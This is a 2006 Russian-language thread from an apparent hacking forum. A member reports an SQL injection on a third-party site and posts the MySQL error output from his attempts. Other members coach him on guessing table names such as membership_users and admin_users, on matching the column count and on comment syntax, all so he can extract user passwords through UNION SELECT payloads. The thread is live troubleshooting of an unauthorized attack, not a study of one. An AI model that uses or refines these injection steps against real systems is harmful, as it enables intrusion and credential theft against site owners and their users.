И снова sql иньекция

Discussion in 'Уязвимости' started by Spaiojek, 9 Mar 2006.

  1. Spaiojek

    Spaiojek New Member

    Joined:
    9 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Нашол вот такую афигительную sql иньекцию:

    Code:
    [SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,null from admin] ( 1146 : Table 'igor987_studio.admin' doesn't exist )
    Немогу таблицу с админкой прошупать, уже вариантов 20 попробывал, админка там точно есть с юзерами, у кого какие вварианты есть?
     
  2. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    видишь префикс membership_ ? ну попробуй с ним че нить намутить. таблица admin - на самом деле маловероятно... попробуй просто user,users (с префиксом).
     
  3. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    admin_users встречал
     
  4. Spaiojek

    Spaiojek New Member

    Joined:
    9 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Блин нашол вот такая фигня вылазит
    Code:
    [SELECT failed in SQL: SELECT COUNT(*) FROM membership_categories WHERE parentid=2 union select null,null,password from membership_users AND enabled=1] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND enabled=1' at line 1 )
    А после того как экранирую, такая
    [SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,password from membership_users*/] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '*/' at line 1 )
     
  5. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    бля нахуя тебе тут что-то эранировать тем более неправильно?
    1)у тебя кол-во столбцов из второго слеекта должно быть равно кол-ву столбцов из первого, то есть один
    2)твои коментарии должны выглядить так
    Code:
    /*КАМЕНТЫ*/
    или
    Code:
    /*КАМЕНТЫ
    с дальнейшими вопрjсами на mysql.ru
     
  6. Spaiojek

    Spaiojek New Member

    Joined:
    9 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Code:
    [SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns )
    Блин вставляю одно поле, он показывает что с базы выгрибает три, ставлю три поля показывает, как я рание писал, что за фигня? подскажитес....
     
  7. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Напиши Задохлику в асю, он в этом хорошо шарит...